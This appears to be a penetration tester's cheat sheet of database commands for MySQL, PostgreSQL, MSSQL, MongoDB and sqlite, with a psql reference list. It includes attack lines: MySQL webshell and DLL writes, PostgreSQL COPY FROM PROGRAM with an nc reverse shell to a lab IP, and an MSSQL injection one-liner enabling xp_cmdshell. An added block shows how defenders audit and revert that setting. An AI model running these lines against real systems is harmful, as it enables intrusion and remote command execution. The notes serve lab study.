SQL Database Uses

MongoDB (not SQL, but kept with the other database notes)

mongo --host localhost --port 27017

show dbs;

use backup;

show collections;
user            <- output: the only collection, queried next

db.user.find()

sqlite3

.tables
.schema table_name
SELECT * FROM table_name;
.exit

MySQL

show databases;
use database_name;
show tables;
select * from table_name;
system whoami
select load_file('C:\\Users\\Administrator\\Desktop\\proof.txt');
select '<?php phpinfo() ?>' into outfile 'C:\\windows\\www\\webshell.php';
select load_file('C:\\programdata\\privesc\\phoneinfo.dll') into dumpfile 'C:\\Windows\\system32\\phoneinfo.dll';
The next two lines are PostgreSQL, not MySQL (COPY ... FROM PROGRAM needs superuser or the pg_execute_server_program role):

DROP TABLE IF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM 'id';select * from cmd_exec;
DROP TABLE IF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.232 443 >/tmp/f';select * from cmd_exec;

MSSQL

Show version

SELECT @@version;

Show all databases

SELECT name FROM sys.databases;

master, tempdb, model, and msdb are default databases.

Listing the tables of a database (here offsec)

SELECT * FROM offsec.information_schema.tables;

Dumping a table with all its columns

select * from offsec.dbo.users;

One-liner (SQL injection context) for enabling xp_cmdshell and executing commands

';EXECUTE sp_configure 'show advanced options', 1;RECONFIGURE;EXECUTE sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXECUTE xp_cmdshell 'whoami'--

';EXECUTE sp_configure 'show advanced options', 1;RECONFIGURE;EXECUTE sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXECUTE xp_cmdshell 'timeout /t 5'--
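Defender-side counterpart, added here as an example and not part of the original notes: the same sp_configure mechanism the one-liner relies on can be audited, traced in the error log and reverted from T-SQL. Assumes a login holding VIEW SERVER STATE and ALTER SETTINGS (sysadmin or serveradmin).

```sql
-- Added example (not from the original notes).
-- 1. Current state: value_in_use is the live setting after RECONFIGURE.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Who can flip it: sp_configure requires ALTER SETTINGS, which the
--    sysadmin and serveradmin fixed server roles hold. Check the caller.
SELECT SUSER_SNAME() AS login_name,
       IS_SRVROLEMEMBER('sysadmin')    AS is_sysadmin,
       IS_SRVROLEMEMBER('serveradmin') AS is_serveradmin;

-- 3. Detection: every sp_configure change is written to the SQL Server
--    error log ("Configuration option 'xp_cmdshell' changed from 0 to 1").
--    xp_readerrorlog is undocumented but widely used: (log 0 = current,
--    type 1 = SQL Server log, search string).
EXEC xp_readerrorlog 0, 1, N'xp_cmdshell';

-- 4. Revert in the reverse order of the one-liner.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Disabling the option does not remove the underlying permission; a sysadmin login can always re-enable it, so the role membership from step 2 is the real control.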

PostgreSQL

psql -U postgres -h 10.4.216.215 -p 5432

#List available databases
\l

#connect to database
\c confluence

#select everything from default user table
select * from cwd_user;

Reference : https://gist.github.com/Kartones/dd3ff5ec5ea238d4c546

Some interesting flags (to see all, use -h or --help depending on your psql version):

  • -E: will describe the underlying queries of the \ commands (cool for learning!)

  • -l: psql will list all databases and then exit (useful if the user you connect with doesn't have a default database, like at AWS RDS)

Most \d commands support additional param of __schema__.name__ and accept wildcards like *.*

  • \?: Show help (list of available commands with an explanation)

  • \q: Quit/Exit

  • \c __database__: Connect to a database

  • \d __table__: Show table definition (columns, etc.) including triggers

  • \d+ __table__: More detailed table definition including description and physical disk size

  • \l: List databases

  • \dy: List events

  • \df: List functions

  • \di: List indexes

  • \dn: List schemas

  • \dt *.*: List tables from all schemas (if *.* is omitted will only show SEARCH_PATH ones)

  • \dT+: List all data types

  • \dv: List views

  • \dx: List all extensions installed

  • \df+ __function__: Show function SQL code.

  • \x: Pretty-format query results instead of the not-so-useful ASCII tables

  • \copy (SELECT * FROM __table_name__) TO 'file_path_and_name.csv' WITH CSV: Export a table as CSV

  • \des+: List all foreign servers

  • \dE[S+]: List all foreign tables

  • \! __bash_command__: execute __bash_command__ (e.g. \! ls)
